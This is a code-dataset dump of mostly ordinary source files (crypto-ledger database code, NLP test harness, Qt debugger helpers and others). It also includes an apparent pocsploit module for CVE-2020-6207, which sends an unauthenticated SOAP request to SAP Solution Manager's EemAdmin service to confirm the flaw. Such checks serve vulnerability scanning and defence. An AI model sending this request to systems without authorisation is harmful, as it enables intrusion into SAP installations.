max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
rotkehlchen/db/ledger_actions.py | rotkehlchenio/rotkehlchen | 137 | 45881 | <filename>rotkehlchen/db/ledger_actions.py
import logging
from typing import TYPE_CHECKING, List, Optional, Tuple
from pysqlcipher3 import dbapi2 as sqlcipher
from rotkehlchen.accounting.ledger_actions import LedgerAction
from rotkehlchen.constants.limits import FREE_LEDGER_ACTIONS_LIMIT
from rotkehlchen.db.filtering import LedgerActionsFilterQuery
from rotkehlchen.errors.asset import UnknownAsset
from rotkehlchen.errors.serialization import DeserializationError
from rotkehlchen.logging import RotkehlchenLogsAdapter
from rotkehlchen.user_messages import MessagesAggregator
logger = logging.getLogger(__name__)
log = RotkehlchenLogsAdapter(logger)
if TYPE_CHECKING:
from rotkehlchen.db.dbhandler import DBHandler
class DBLedgerActions():
def __init__(self, database: 'DBHandler', msg_aggregator: MessagesAggregator):
self.db = database
self.msg_aggregator = msg_aggregator
def get_ledger_actions_and_limit_info(
self,
filter_query: LedgerActionsFilterQuery,
has_premium: bool,
) -> Tuple[List[LedgerAction], int]:
"""Gets all ledger actions for the query from the DB
Also returns how many are the total found for the filter
"""
actions = self.get_ledger_actions(filter_query=filter_query, has_premium=has_premium)
cursor = self.db.conn.cursor()
query, bindings = filter_query.prepare(with_pagination=False)
query = 'SELECT COUNT(*) from ledger_actions ' + query
total_found_result = cursor.execute(query, bindings)
return actions, total_found_result.fetchone()[0]
def get_ledger_actions(
self,
filter_query: LedgerActionsFilterQuery,
has_premium: bool,
) -> List[LedgerAction]:
"""Returns a list of ledger actions optionally filtered by the given filter.
Returned list is ordered according to the passed filter query
"""
cursor = self.db.conn.cursor()
query_filter, bindings = filter_query.prepare()
if has_premium:
query = 'SELECT * from ledger_actions ' + query_filter
results = cursor.execute(query, bindings)
else:
query = 'SELECT * FROM (SELECT * from ledger_actions ORDER BY timestamp DESC LIMIT ?) ' + query_filter # noqa: E501
results = cursor.execute(query, [FREE_LEDGER_ACTIONS_LIMIT] + bindings)
actions = []
for result in results:
try:
action = LedgerAction.deserialize_from_db(result)
except DeserializationError as e:
self.msg_aggregator.add_error(
f'Error deserializing Ledger Action from the DB. Skipping it.'
f'Error was: {str(e)}',
)
continue
except UnknownAsset as e:
self.msg_aggregator.add_error(
f'Error deserializing Ledger Action from the DB. Skipping it. '
f'Unknown asset {e.asset_name} found',
)
continue
actions.append(action)
return actions
def add_ledger_action(self, action: LedgerAction) -> int:
"""Adds a new ledger action to the DB and returns its identifier for success
May raise:
- sqlcipher.IntegrityError if there is a conflict at addition in _add_gitcoin_extra_data.
If this error is raised connection needs to be rolled back by the caller.
"""
cursor = self.db.conn.cursor()
query = """
INSERT INTO ledger_actions(
timestamp, type, location, amount, asset, rate, rate_asset, link, notes
)
VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);"""
cursor.execute(query, action.serialize_for_db())
identifier = cursor.lastrowid
action.identifier = identifier
self.db.conn.commit()
return identifier
def add_ledger_actions(self, actions: List[LedgerAction]) -> None:
"""Adds multiple ledger action to the DB
Is slow due to not using executemany since the ledger actions table
utilized an auto generated primary key.
"""
for action in actions:
try:
self.add_ledger_action(action)
except sqlcipher.IntegrityError: # pylint: disable=no-member
self.db.msg_aggregator.add_warning('Did not add ledger action to DB due to it already existing') # noqa: E501
log.warning(f'Did not add ledger action {action} to the DB due to it already existing') # noqa: E501
self.db.conn.rollback() # undo the addition and rollack to last commit
def remove_ledger_action(self, identifier: int) -> Optional[str]:
"""Removes a ledger action from the DB by identifier
Returns None for success or an error message for error
"""
error_msg = None
cursor = self.db.conn.cursor()
cursor.execute(
'DELETE from ledger_actions WHERE identifier = ?;', (identifier,),
)
if cursor.rowcount < 1:
error_msg = (
f'Tried to delete ledger action with identifier {identifier} but '
f'it was not found in the DB'
)
self.db.conn.commit()
return error_msg
def edit_ledger_action(self, action: LedgerAction) -> Optional[str]:
"""Edits a ledger action from the DB by identifier
Does not edit the extra data at the moment
Returns None for success or an error message for error
"""
error_msg = None
cursor = self.db.conn.cursor()
query = """
UPDATE ledger_actions SET timestamp=?, type=?, location=?, amount=?,
asset=?, rate=?, rate_asset=?, link=?, notes=? WHERE identifier=?"""
db_action_tuple = action.serialize_for_db()
cursor.execute(query, (*db_action_tuple, action.identifier))
if cursor.rowcount != 1:
error_msg = (
f'Tried to edit ledger action with identifier {action.identifier} '
f'but it was not found in the DB'
)
self.db.conn.commit()
return error_msg
|
atlas/foundations_events/src/integration/__init__.py | DeepLearnI/atlas | 296 | 45894 | <gh_stars>100-1000
import foundations
from integration.test_consumers import TestConsumers |
examples/sum_sum_plus_one_lt.py | uta8a/Jikka | 139 | 45905 | # https://judge.kimiyuki.net/problem/sum-sum-plus-one-lt
from typing import *
def solve(a: List[int]) -> int:
n = len(a)
ans = 0
for i in range(n):
for j in range(i + 1, n):
ans += a[i] - a[j]
return ans
def main() -> None:
n = int(input())
a = list(map(int, input().split()))
assert len(a) == n
ans = solve(a)
print(ans)
if __name__ == "__main__":
main()
|
src/third_party/v8/js2c-wrap.py | morsvolia/mongo | 324 | 45920 | <filename>src/third_party/v8/js2c-wrap.py
#!/usr/bin/python2
import sys
js2c_dir = sys.argv[1]
sys.path.append(js2c_dir)
import js2c
srcs = sys.argv[2]
natives = sys.argv[3].split(',')
type = sys.argv[4]
compression = sys.argv[5]
js2c.JS2C(natives, [srcs], {'TYPE': type, 'COMPRESSION': compression})
|
starfish/core/morphology/Filter/map.py | haoxusci/starfish | 164 | 45921 | <gh_stars>100-1000
import warnings
from typing import Optional, Union
from starfish.core.morphology.binary_mask import BinaryMaskCollection
from starfish.core.types import FunctionSource, FunctionSourceBundle
from ._base import FilterAlgorithm
class Map(FilterAlgorithm):
"""
Map from input to output by applying a specified function to the input. The output must have
the same shape as the input.
Parameters
----------
func : Union[str, FunctionSourceBundle]
Function to apply across to each of the tiles in the input.
If this value is a string, then the ``module`` parameter is consulted to determine which
python package is used to find the function. If ``module`` is not specified, then the
default is :py:attr:`FunctionSource.np`.
If this value is a ``FunctionSourceBundle``, then the python package and module name is
obtained from the bundle.
module : Optional[FunctionSource]
Python module that serves as the source of the function. It must be listed as one of the
members of :py:class:`FunctionSource`.
Currently, the supported FunctionSources are:
- ``np``: the top-level package of numpy
- ``scipy``: the top-level package of scipy
This is being deprecated in favor of specifying the function as a ``FunctionSourceBundle``.
Examples
--------
Applying a binary opening function.
>>> from starfish.core.morphology.binary_mask.test import factories
>>> from starfish.morphology import Filter
>>> from starfish.types import FunctionSource
>>> from skimage.morphology import disk
>>> binary_mask_collection = factories.binary_mask_collection_2d()
>>> opener = Filter.Map(FunctionSource.scipy("morphology.binary_opening"), disk(4))
>>> opened = opener.run(binary_mask_collection)
"""
def __init__(
self,
func: Union[str, FunctionSourceBundle],
*func_args,
module: FunctionSource = FunctionSource.np,
**func_kwargs,
) -> None:
if isinstance(func, str):
if module is not None:
warnings.warn(
f"The module parameter is being deprecated. Use "
f"`func=FunctionSource.{module.name}{func} instead.",
DeprecationWarning)
else:
module = FunctionSource.np
self._func = module(func)
elif isinstance(func, FunctionSourceBundle):
if module is not None:
raise ValueError(
"When passing in the function as a `FunctionSourceBundle`, module should not "
"be set."
)
self._func = func
self._func_args = func_args
self._func_kwargs = func_kwargs
def run(
self,
binary_mask_collection: BinaryMaskCollection,
n_processes: Optional[int] = None,
*args,
**kwargs
) -> BinaryMaskCollection:
"""Map from input to output by applying a specified function to the input.
Parameters
----------
binary_mask_collection : BinaryMaskCollection
BinaryMaskCollection to be filtered.
n_processes : Optional[int]
The number of processes to use for apply. If None, uses the output of os.cpu_count()
(default = None).
Returns
-------
BinaryMaskCollection
Return the results of filter as a new BinaryMaskCollection.
"""
# Apply the reducing function
return binary_mask_collection._apply(
self._func.resolve(),
*self._func_args,
**self._func_kwargs)
|
tools/bibliotheca_account_headers.py | dentes-purgo/opacclient | 120 | 45963 | <reponame>dentes-purgo/opacclient<filename>tools/bibliotheca_account_headers.py
#!/usr/bin/python3
# Searches for Bibliotheca libraries in the assets/bibs/ directory and tries if they have a w3oini.txt configuration to
# find out what the headers in their account view are called.
import json
import os
import configparser
import urllib.request
from urllib.error import HTTPError, URLError
from multiprocessing import Pool
from socket import timeout
DIR = 'opacclient/opacapp/src/main/assets/bibs/'
HEADERS_LENT = 'opacclient/libopac/src/main/resources/bibliotheca/headers_lent.json'
HEADERS_RESERVATIONS = 'opacclient/libopac/src/main/resources/bibliotheca/headers_reservations.json'
def loadconfig(filename):
f = os.path.join(DIR, filename)
data = json.load(open(f))
if data['api'] == 'bibliotheca':
url = data['data']['baseurl']
try:
return urllib.request.urlopen(url + '/w3oini.txt', timeout=10).read().decode('iso-8859-1')
except (HTTPError, URLError, configparser.ParsingError):
print('could not find config for {}'.format(filename))
return None
except timeout:
print('timeout for {}'.format(filename))
return None
def handleconfig(filename, config_str):
config = configparser.RawConfigParser(allow_no_value=True, strict=False)
try:
config.read_string(config_str)
for i in range(1, 21):
conf = config.get("ANZEIGEKONTOFELDER", "konto" + str(i))
key = conf.split("#")[0].lower()
titles = conf.split("#")[1:]
type_lent = None
type_reservations = None
if key in ('exemplarnr', 'buchungsnr'):
type_lent = 'barcode'
elif key == 'verf':
type_lent = type_reservations = 'author'
elif key == 'titel':
type_lent = type_reservations = 'title'
elif key == 'frist':
type_lent = 'returndate'
elif key == 'bereit':
type_reservations = 'availability'
elif key == 'ausleihstatus':
type_lent = 'status'
elif key == 'zwst':
type_lent = 'homebranch'
type_reservations = 'branch'
elif key == 'ausleihstelle':
type_lent = 'lendingbranch'
elif key == 'mediengrp':
type_lent = type_reservations = 'format'
elif key == 'bereit bis':
type_reservations = 'expirationdate'
elif key == 'reserviert' or key == 'saeumnisgebuehr':
pass
if type_lent is not None:
for title in titles:
if title not in headers_lent:
print('adding {} to headers_lent.json with meaning {}'.format(title, type_lent))
headers_lent[title] = type_lent
elif headers_lent[title] != type_lent:
print('CONFLICT: {} should be {}, but is {} in headers_lent.json!'
.format(title, type_lent, headers_lent[title]))
if type_reservations is not None:
for title in titles:
if title not in headers_reservations:
print('adding {} to headers_reservations.json with meaning {}'.format(title,
type_reservations))
headers_reservations[title] = type_reservations
elif headers_reservations[title] != type_reservations:
print('CONFLICT: {} should be {}, but is {} in headers_reservations.json!'
.format(title, type_reservations, headers_reservations[title]))
except configparser.ParsingError:
print('could not parse config for {}'.format(filename))
def save(filename, data):
with open(filename, 'w') as fp:
json.dump(data, fp, sort_keys=True, indent=4)
fp.write("\n")
if __name__ == '__main__':
print('loading configs')
p = Pool(50)
filenames = os.listdir(DIR)
configs = p.map(loadconfig, filenames)
print('received {} configs'.format(sum(x is not None for x in configs)))
print('parsing configs')
headers_lent = json.load(open(HEADERS_LENT))
headers_reservations = json.load(open(HEADERS_RESERVATIONS))
for (filename, config) in zip(filenames, configs):
if config is not None:
handleconfig(filename, config)
save(HEADERS_LENT, headers_lent)
save(HEADERS_RESERVATIONS, headers_reservations) |
2020/CVE-2020-6207/poc/pocsploit/CVE-2020-6207.py | hjyuan/reapoc | 421 | 46012 | <reponame>hjyuan/reapoc
import requests
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''SAP Solution Manager remote unauthorized OS commands execution''',
"description": '''SAP Solution Manager (SolMan) running version 7.2 has CVE-2020-6207 vulnerability within the SAP EEM servlet (tc~smd~agent~application~eem). The vulnerability occurs due to missing authentication checks when submitting SOAP requests to the /EemAdminService/EemAdmin page to get information about connected SMDAgents, send HTTP request (SSRF), and execute OS commands on connected SMDAgent.''',
"severity": "critical",
"references": [
"https://launchpad.support.sap.com/#/notes/2890213",
"https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=540935305",
"https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf",
"https://github.com/chipik/SAP_EEM_CVE-2020-6207",
"https://www.rapid7.com/db/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce/",
"https://www.rapid7.com/db/modules/exploit/multi/sap/cve_2020_6207_solman_rs/"
],
"classification": {
"cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"cvss-score": "",
"cve-id": "CVE-2020-6207",
"cwe-id": "CWE-306"
},
"metadata":{
"vuln-target": "",
},
"tags": ["cve", "cve2020", "sap", "solman", "rce"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
path = """/EemAdminService/EemAdmin"""
method = "POST"
data = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:adm="http://sap.com/smd/eem/admin/"><soapenv:Header/><soapenv:Body><adm:getAllAgentInfo/></soapenv:Body></soapenv:Envelope>"""
headers = {'SOAPAction': '""', 'Content-Type': 'text/xml; charset=UTF-8', 'Connection': 'close'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if (""":Envelope""" in resp0.text and """:Body""" in resp0.text and """:getAllAgentInfoResponse""" in resp0.text) and (resp0.status_code == 200) and ("""text/xml""" in str(resp0.headers) and """SAP NetWeaver Application Server""" in str(resp0.headers)):
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url |
tests/models/r-net_dynamic_test.py | matthew-z/pytorch_rnet | 227 | 46013 | <filename>tests/models/r-net_dynamic_test.py
from allennlp.common.testing import ModelTestCase
from qa.squad.rnet import RNet
class RNetDynamicTest(ModelTestCase):
def setUp(self):
super().setUp()
self.set_up_model('tests/fixtures/rnet/experiment_dynamic.jsonnet',
'tests/fixtures/data/squad.json')
def test_model_can_train_save_and_load(self):
self.ensure_model_can_train_save_and_load(self.param_file)
|
utils/tester.py | niloofar17/MetaDialog | 204 | 46022 | # coding: utf-8
from typing import List, Tuple, Dict
import torch
import logging
import sys
import os
import copy
import json
import collections
import subprocess
from tqdm import tqdm, trange
from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler
from torch.utils.data.distributed import DistributedSampler
# My Staff
from utils.iter_helper import PadCollate, FewShotDataset
from utils.preprocessor import FewShotFeature, ModelInput
from utils.device_helper import prepare_model
from utils.model_helper import make_model, load_model
from models.modules.transition_scorer import FewShotTransitionScorer
from models.few_shot_seq_labeler import FewShotSeqLabeler
logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt='%m/%d/%Y %H:%M:%S',
level=logging.INFO,
stream=sys.stdout)
logger = logging.getLogger(__name__)
RawResult = collections.namedtuple("RawResult", ["feature", "prediction"])
class TesterBase:
"""
Support features:
- multi-gpu [accelerating]
- distributed gpu [accelerating]
- padding when forward [better result & save space]
"""
def __init__(self, opt, device, n_gpu):
if opt.gradient_accumulation_steps < 1:
raise ValueError("Invalid gradient_accumulation_steps parameter: {}, should be >= 1".format(
opt.gradient_accumulation_steps))
self.opt = opt
# Following is used to split the batch to save space
self.batch_size = opt.test_batch_size
self.device = device
self.n_gpu = n_gpu
def do_test(self, model: torch.nn.Module, test_features: List[FewShotFeature], id2label: dict,
log_mark: str = 'test_pred'):
logger.info("***** Running eval *****")
# print("***** Running eval *****")
logger.info(" Num features = %d", len(test_features))
logger.info(" Batch size = %d", self.batch_size)
all_results = []
model.eval()
data_loader = self.get_data_loader(test_features)
for batch in tqdm(data_loader, desc="Eval-Batch Progress"):
batch = tuple(t.to(self.device) for t in batch) # multi-gpu does scattering it-self
with torch.no_grad():
predictions = self.do_forward(batch, model)
for i, feature_gid in enumerate(batch[0]): # iter over feature global id
prediction = predictions[i]
feature = test_features[feature_gid.item()]
all_results.append(RawResult(feature=feature, prediction=prediction))
if model.emb_log:
model.emb_log.write('text_' + str(feature_gid.item()) + '\t'
+ '\t'.join(feature.test_feature_item.data_item.seq_in) + '\n')
# close file handler
if model.emb_log:
model.emb_log.close()
scores = self.eval_predictions(all_results, id2label, log_mark)
return scores
def get_data_loader(self, features):
dataset = TensorDataset([self.unpack_feature(f) for f in features])
if self.opt.local_rank == -1:
sampler = RandomSampler(dataset)
else:
sampler = DistributedSampler(dataset)
data_loader = DataLoader(dataset, sampler=sampler, batch_size=self.batch_size)
return data_loader
def clone_model(self, model, id2label):
# get a new instance
return copy.deepcopy(model)
def unpack_feature(self, feature) -> List[torch.Tensor]:
raise NotImplementedError
def do_forward(self, batch, model):
prediction = model(*batch)
return prediction
def eval_predictions(self, *args, **kwargs) -> float:
raise NotImplementedError
class FewShotTester(TesterBase):
"""
Support features:
- multi-gpu [accelerating]
- distributed gpu [accelerating]
- padding when forward [better result & save space]
"""
def __init__(self, opt, device, n_gpu):
super(FewShotTester, self).__init__(opt, device, n_gpu)
def get_data_loader(self, features):
dataset = FewShotDataset([self.unpack_feature(f) for f in features])
if self.opt.local_rank == -1:
sampler = SequentialSampler(dataset)
else:
sampler = DistributedSampler(dataset)
pad_collate = PadCollate(dim=-1, sp_dim=-2, sp_item_idx=[3, 8, 12]) # nwp_index, spt_tgt need special padding
data_loader = DataLoader(dataset, sampler=sampler, batch_size=self.batch_size, collate_fn=pad_collate)
return data_loader
def eval_predictions(self, all_results: List[RawResult], id2label: dict, log_mark: str) -> float:
""" Our result score is average score of all few-shot batches. """
all_batches = self.reform_few_shot_batch(all_results)
all_scores = []
for b_id, fs_batch in all_batches:
f1 = self.eval_one_few_shot_batch(b_id, fs_batch, id2label, log_mark)
all_scores.append(f1)
return sum(all_scores) * 1.0 / len(all_scores)
def eval_one_few_shot_batch(self, b_id, fs_batch: List[RawResult], id2label: dict, log_mark: str) -> float:
pred_file_name = '{}.{}.txt'.format(log_mark, b_id)
output_prediction_file = os.path.join(self.opt.output_dir, pred_file_name)
if self.opt.task == 'sl':
self.writing_sl_prediction(fs_batch, output_prediction_file, id2label)
precision, recall, f1 = self.eval_with_script(output_prediction_file)
elif self.opt.task == 'sc':
precision, recall, f1 = self.writing_sc_prediction(fs_batch, output_prediction_file, id2label)
else:
raise ValueError("Wrong task.")
return f1
def writing_sc_prediction(self, fs_batch: List[RawResult], output_prediction_file: str, id2label: dict):
tp, fp, fn = 0, 0, 0
writing_content = []
for result in fs_batch:
pred_ids = result.prediction # prediction is directly the predict ids [pad is removed in decoder]
feature = result.feature
pred_label = set([id2label[pred_id] for pred_id in pred_ids])
label = set(feature.test_feature_item.data_item.label)
writing_content.append({
'seq_in': feature.test_feature_item.data_item.seq_in,
'pred': list(pred_label),
'label': list(label),
})
tp, fp, fn = self.update_f1_frag(pred_label, label, tp, fp, fn) # update tp, fp, fn
with open(output_prediction_file, "w") as writer:
json.dump(writing_content, writer, indent=2)
return self.compute_f1(tp, fp, fn)
def update_f1_frag(self, pred_label, label, tp=0, fp=0, fn=0):
tp += len(pred_label & label)
fp += len(pred_label - label)
fn += len(label - pred_label)
return tp, fp, fn
def compute_f1(self, tp, fp, fn):
tp += 0.0000001 # to avoid zero division
fp += 0.0000001
fn += 0.0000001
precision = 1.0 * tp / (tp + fp)
recall = 1.0 * tp / (tp + fn)
f1 = 2 * precision * recall / (precision + recall)
return precision, recall, f1
def writing_sl_prediction(self, fs_batch: List[RawResult], output_prediction_file: str, id2label: dict):
writing_content = []
for result in fs_batch:
prediction = result.prediction
feature = result.feature
pred_ids = prediction # prediction is directly the predict ids
if len(pred_ids) != len(feature.test_feature_item.data_item.seq_in):
raise RuntimeError("Failed to align the pred_ids to texts: {},{} \n{},{} \n{},{}".format(
len(pred_ids), pred_ids,
len(feature.test_feature_item.data_item.seq_in), feature.test_feature_item.data_item.seq_in,
len(feature.test_feature_item.data_item.seq_out), feature.test_feature_item.data_item.seq_out
))
for pred_id, word, true_label in zip(pred_ids, feature.test_feature_item.data_item.seq_in, feature.test_feature_item.data_item.seq_out):
pred_label = id2label[pred_id]
writing_content.append('{0} {1} {2}'.format(word, true_label, pred_label))
writing_content.append('')
with open(output_prediction_file, "w") as writer:
writer.write('\n'.join(writing_content))
def eval_with_script(self, output_prediction_file):
script_args = ['perl', self.opt.eval_script]
with open(output_prediction_file, 'r') as res_file:
p = subprocess.Popen(script_args, stdout=subprocess.PIPE, stdin=res_file)
p.wait()
std_results = p.stdout.readlines()
if self.opt.verbose:
for r in std_results:
print(r)
std_results = str(std_results[1]).split()
precision = float(std_results[3].replace('%;', ''))
recall = float(std_results[5].replace('%;', ''))
f1 = float(std_results[7].replace('%;', '').replace("\\n'", ''))
return precision, recall, f1
def reform_few_shot_batch(self, all_results: List[RawResult]) -> List[List[Tuple[int, RawResult]]]:
"""
Our result score is average score of all few-shot batches.
So here, we classify all result according to few-shot batch id.
"""
all_batches = {}
for result in all_results:
b_id = result.feature.batch_gid
if b_id not in all_batches:
all_batches[b_id] = [result]
else:
all_batches[b_id].append(result)
return sorted(all_batches.items(), key=lambda x: x[0])
def unpack_feature(self, feature: FewShotFeature) -> List[torch.Tensor]:
ret = [
torch.LongTensor([feature.gid]),
# test
feature.test_input.token_ids,
feature.test_input.segment_ids,
feature.test_input.nwp_index,
feature.test_input.input_mask,
feature.test_input.output_mask,
# support
feature.support_input.token_ids,
feature.support_input.segment_ids,
feature.support_input.nwp_index,
feature.support_input.input_mask,
feature.support_input.output_mask,
# target
feature.test_target,
feature.support_target,
# Special
torch.LongTensor([len(feature.support_feature_items)]), # support num
]
return ret
def do_forward(self, batch, model):
(
gid, # 0
test_token_ids, # 1
test_segment_ids, # 2
test_nwp_index, # 3
test_input_mask, # 4
test_output_mask, # 5
support_token_ids, # 6
support_segment_ids, # 7
support_nwp_index, # 8
support_input_mask, # 9
support_output_mask, # 10
test_target, # 11
support_target, # 12
support_num, # 13
) = batch
prediction = model(
# loss, prediction = model(
test_token_ids,
test_segment_ids,
test_nwp_index,
test_input_mask,
test_output_mask,
support_token_ids,
support_segment_ids,
support_nwp_index,
support_input_mask,
support_output_mask,
test_target,
support_target,
support_num,
)
return prediction
def get_value_from_order_dict(self, order_dict, key):
""""""
for k, v in order_dict.items():
if key in k:
return v
return []
def clone_model(self, model, id2label):
""" clone only part of params """
# deal with data parallel model
new_model: FewShotSeqLabeler
old_model: FewShotSeqLabeler
if self.opt.local_rank != -1 or self.n_gpu > 1 and hasattr(model, 'module'): # the model is parallel class here
old_model = model.module
else:
old_model = model
emission_dict = old_model.emission_scorer.state_dict()
old_num_tags = len(self.get_value_from_order_dict(emission_dict, 'label_reps'))
config = {'num_tags': len(id2label), 'id2label': id2label}
if 'num_anchors' in old_model.config:
config['num_anchors'] = old_model.config['num_anchors'] # Use previous model's random anchors.
# get a new instance for different domain
new_model = make_model(opt=self.opt, config=config)
new_model = prepare_model(self.opt, new_model, self.device, self.n_gpu)
if self.opt.local_rank != -1 or self.n_gpu > 1:
sub_new_model = new_model.module
else:
sub_new_model = new_model
''' copy weights and stuff '''
if old_model.opt.task == 'sl' and old_model.transition_scorer:
# copy one-by-one because target transition and decoder will be left un-assigned
sub_new_model.context_embedder.load_state_dict(old_model.context_embedder.state_dict())
sub_new_model.emission_scorer.load_state_dict(old_model.emission_scorer.state_dict())
for param_name in ['backoff_trans_mat', 'backoff_start_trans_mat', 'backoff_end_trans_mat']:
sub_new_model.transition_scorer.state_dict()[param_name].copy_(
old_model.transition_scorer.state_dict()[param_name].data)
else:
sub_new_model.load_state_dict(old_model.state_dict())
return new_model
class SchemaFewShotTester(FewShotTester):
def __init__(self, opt, device, n_gpu):
super(SchemaFewShotTester, self).__init__(opt, device, n_gpu)
def get_data_loader(self, features):
""" add label index into special padding """
dataset = FewShotDataset([self.unpack_feature(f) for f in features])
if self.opt.local_rank == -1:
sampler = SequentialSampler(dataset)
else:
sampler = DistributedSampler(dataset)
pad_collate = PadCollate(dim=-1, sp_dim=-2, sp_item_idx=[3, 8, 12, 16]) # nwp_index, spt_tgt need sp-padding
data_loader = DataLoader(dataset, sampler=sampler, batch_size=self.batch_size, collate_fn=pad_collate)
return data_loader
def unpack_feature(self, feature: FewShotFeature) -> List[torch.Tensor]:
ret = [
torch.LongTensor([feature.gid]),
# test
feature.test_input.token_ids,
feature.test_input.segment_ids,
feature.test_input.nwp_index,
feature.test_input.input_mask,
feature.test_input.output_mask,
# support
feature.support_input.token_ids,
feature.support_input.segment_ids,
feature.support_input.nwp_index,
feature.support_input.input_mask,
feature.support_input.output_mask,
# target
feature.test_target,
feature.support_target,
# Special
torch.LongTensor([len(feature.support_feature_items)]), # support num
# label feature
feature.label_input.token_ids,
feature.label_input.segment_ids,
feature.label_input.nwp_index,
feature.label_input.input_mask,
feature.label_input.output_mask,
]
return ret
def do_forward(self, batch, model):
(
gid, # 0
test_token_ids, # 1
test_segment_ids, # 2
test_nwp_index, # 3
test_input_mask, # 4
test_output_mask, # 5
support_token_ids, # 6
support_segment_ids, # 7
support_nwp_index, # 8
support_input_mask, # 9
support_output_mask, # 10
test_target, # 11
support_target, # 12
support_num, # 13
# label feature
label_token_ids, # 14
label_segment_ids, # 15
label_nwp_index, # 16
label_input_mask, # 17
label_output_mask, # 18
) = batch
prediction = model(
test_token_ids,
test_segment_ids,
test_nwp_index,
test_input_mask,
test_output_mask,
support_token_ids,
support_segment_ids,
support_nwp_index,
support_input_mask,
support_output_mask,
test_target,
support_target,
support_num,
# label feature
label_token_ids,
label_segment_ids,
label_nwp_index,
label_input_mask,
label_output_mask,
)
return prediction
def eval_check_points(opt, tester, test_features, test_id2label, device):
all_cpt_file = list(filter(lambda x: '.cpt.pl' in x, os.listdir(opt.saved_model_path)))
all_cpt_file = sorted(all_cpt_file,
key=lambda x: int(x.replace('model.step', '').replace('.cpt.pl', '')))
max_score = 0
for cpt_file in all_cpt_file:
cpt_model = load_model(os.path.join(opt.saved_model_path, cpt_file))
testing_model = tester.clone_model(cpt_model, test_id2label)
if opt.mask_transition and opt.task == 'sl':
testing_model.label_mask = opt.test_label_mask.to(device)
test_score = tester.do_test(testing_model, test_features, test_id2label, log_mark='test_pred')
if test_score > max_score:
max_score = test_score
logger.info('cpt_file:{} - test:{}'.format(cpt_file, test_score))
return max_score
|
tests/helpers/examples/failure_reasons/__init__.py | proofit404/userstories | 187 | 46026 | from enum import Enum
from stories import story
# Base classes.
class ChildWithNull:
@story
def x(I):
I.one
class NextChildWithNull:
@story
def y(I):
I.two
class ParentWithNull:
@story
def a(I):
I.before
I.x
I.after
class SequenceParentWithNull:
@story
def a(I):
I.before
I.x
I.y
I.after
class ChildWithList:
@story
def x(I):
I.one
ChildWithList.x.failures(["foo", "bar", "baz"])
class NextChildWithList:
@story
def y(I):
I.two
NextChildWithList.y.failures(["spam", "ham", "eggs"])
class ParentWithList:
@story
def a(I):
I.before
I.x
I.after
ParentWithList.a.failures(["foo", "bar", "baz"])
class WideParentWithList:
@story
def a(I):
I.before
I.x
I.after
WideParentWithList.a.failures(["foo", "bar", "baz", "quiz"])
class ShrinkParentWithList:
@story
def a(I):
I.before
I.x
I.after
ShrinkParentWithList.a.failures(["foo", "quiz"])
class ChildWithEnum:
@story
def x(I):
I.one
@x.failures
class Errors(Enum):
foo = 1
bar = 2
baz = 3
class NextChildWithEnum:
@story
def y(I):
I.two
@y.failures
class Errors(Enum):
spam = 1
ham = 2
eggs = 3
class ParentWithEnum:
@story
def a(I):
I.before
I.x
I.after
@ParentWithEnum.a.failures
class Errors(Enum):
foo = 1
bar = 2
baz = 3
class WideParentWithEnum:
@story
def a(I):
I.before
I.x
I.after
@WideParentWithEnum.a.failures
class Errors(Enum): # noqa: F811
foo = 1
bar = 2
baz = 3
quiz = 4
class ShrinkParentWithEnum:
@story
def a(I):
I.before
I.x
I.after
@ShrinkParentWithEnum.a.failures
class Errors(Enum): # noqa: F811
foo = 1
quiz = 4
|
Qt-Widgets-and-more/debuggingHelper/QWAMTypes.py | jgompis/kdabtv | 140 | 46045 | # Check http://doc.qt.io/qtcreator/creator-debugging-helpers.html
# for more details or look at qttypes.py, stdtypes.py, boosttypes.py
# for more complex examples.
from dumper import Children, SubItem, UnnamedSubItem, DumperBase
from utils import DisplayFormat, TypeCode
from qttypes import *
import struct
####################### Your code below #######################
### Part 1
def qdump__Foo(d, value):
i = value["i"].integer()
j = value["j"].integer()
d.putValue("[%d,%d]" % (i,j))
d.putExpandable()
if d.isExpanded():
with Children(d):
d.putSubItem('j', value["j"])
# Don't try this at home :-)
# and the "i" (that is the one in quotes stand for type integer...
d.putSubItem('i', d.createValue(struct.pack("i",i), d.intType()))
with SubItem(d, "sum"):
d.putValue(i+j)
d.putType(d.intType()) # not really needed though
### Part 2
def qdump__MyNameSpace__Foo(d, value):
d.putValue("Secret!")
d.putPlainChildren(value)
### Part 3
#def qdump__Money(d, value):
# amount = value["m_amount"].floatingPoint()
# currency = value["m_currency"].integer()
# d.putValue("%s %s" % (("EUR" if (currency == 0) else "USD"), amount))
# d.putPlainChildren(value)
### Part 4
def qdump__Money(d, value):
str = d.call("@QString", value, "toString")
d.putStringValue(str)
d.putPlainChildren(value)
### Part 5
def qdump__FooOrBar(d, value):
str=d.parseAndEvaluate("fooOrBarToString(*((FooOrBar*)%s))" % value.laddress)
d.putStringValue(str)
d.putPlainChildren(value)
#### Part 6
def qdump__UserID(d, value):
employeeID = value.integer()
str=d.parseAndEvaluate("EmployeeDatabase::instance().lookup(%d)" % employeeID)
d.putStringValue(str)
def qdump__UserIDList(d, value):
d.createTypedefedType(d.lookupType("int"), "UserID");
